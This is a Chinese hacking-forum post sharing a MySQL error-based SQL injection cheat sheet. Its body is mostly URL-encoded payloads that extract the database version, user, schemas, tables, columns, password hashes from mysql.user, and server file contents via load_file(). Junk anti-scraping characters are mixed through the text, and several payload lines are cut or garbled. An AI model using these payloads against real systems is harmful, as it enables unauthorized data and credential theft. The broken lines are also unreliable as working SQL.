找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2206|回复: 0
打印 上一主题 下一主题

Mysql暴错注入参考(pdf)

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-27 11:00:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 Nightmare 于 2013-3-17 14:20 编辑 * n! O2 l0 L: \4 ^; F5 p8 @) Q
4 y: o& q; e7 T, B7 ^/ Y4 o& P9 A
' n* U% G5 l* H. @( w# O
Mysql暴错注入参考(pdf),每天一贴。。。
% t, i- M# z1 l% s4 n3 a% k7 O' q+ k0 f  V  x& ^; m
MySql Error Based Injection Reference
( a* m1 s8 B" ^2 x( q" m[Mysql暴错注入参考], L, B- y3 c# B  v; d
Authornig0s1992* j5 t( o- T( I% Q2 ~- E% [+ \! f
Blog:http://pnig0s1992.blog.51cto.com/# u* T( t& ~# _) e9 z9 Q% G
TeAm:http://www.FreeBuf.com// y0 V  i1 b& s
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
7 o$ S5 d' N1 M, b6 a: Z小部分版本使用name_const()时会报错.可以用给出的Method.2测试
8 M8 J, t. ^$ v$ e/ {& r" I% y0 D. z查询版本:# A; v$ e' R( L# A( H( a5 y, s' Q
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+, ~& `+ y. v4 G0 x- P
join+(select+name_const(@@version,0))b)c). r# }9 p4 k1 e# l
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
. R- b% N4 d+ k0 X1 n  uup by a)b)- ^6 o* m$ e# k% a; z
查询当前用户:
. v7 K1 T/ H7 G$ r4 a3 }5 F4 q) a; g8 @, jMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
" O% q6 x0 E; m  g5 |# D7 f  @9 wMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
* U( i& C* S8 J8 ]7 Dand(0)*2))x+from+information_schema.tables+group+by+x)a)0 l. ]  Y' P2 \. `' }
查询当前数据库:& }- w, q; n5 y
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)% T. i2 z9 z5 [. G, a/ }
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
1 [. x: N- T1 F1 D* |' f2 N2 cor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
& k$ T  O. d' j  a7 x依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+- ?0 a  [, h7 C3 z6 Z
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n- A& q2 y: j0 }; g/ x; K6 c
顺序替换
, R) V  ^& i! a9 F6 K爆指定库数目:
' Z1 i# _7 ~$ O  |* W: I0 F  }and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t' j, a- k" D1 V! H# O: H: a' e/ v
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group6 k" k9 X- _2 e
+by+x)a)+and+1=1 0x6D7973716C=mysql
; r. Z, Q2 F8 U0 E% ], e依次爆表:. D9 R+ d' R0 z% P0 x
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t, p" M! G; w. e% O0 ^# i
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta4 `3 O5 t0 y0 V9 _! j, ^) h9 P
bles+group+by+x)a)+and+1=12 q7 }6 e; C3 L0 N  k
0x6D7973716C=Mysql 将n顺序替换
/ y  X: J! y2 X! Z& Y爆表内字段数目:3 O  ?, n4 v8 h) p6 y
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE  Q, d  u2 C8 l6 ]; S" g
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran& \8 Q1 l& t% g5 j) t/ Z# ^
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
+ u$ @1 p; b  I6 b. v( h依次爆字段:
# R$ O# W! G3 _# X7 d4 m9 Nand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
  y2 R7 Z* p* K7 g+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
1 i1 h3 O. J  _* W- q8 Dloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换, N# t# m) O' U, Q' F
依次暴内容:$ Z! V- ^; d& ^" c! h) [  I. F
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche: ~4 a. M+ U; v0 u4 P: M
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=13 @& t( W0 r8 u7 ^- m: M/ N
将n顺序替换
0 B! y+ A7 k4 V- W爆文件内容:
! C8 G+ u, X! c# n. a6 W3 I8 Land+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
/ ~$ o! W7 I7 [from+information_schema.tables+group+by+a)b)
4 T; T5 Y0 O8 l7 ~2 s- _  m0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
: ?* Y  a* l) @" w' }Thx for reading.
. E9 |6 d. W6 P, d/ o! l1 [5 L4 ]' A. ?  M2 j2 V
不要下载也可以,
% h- i9 a, q( g" `

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表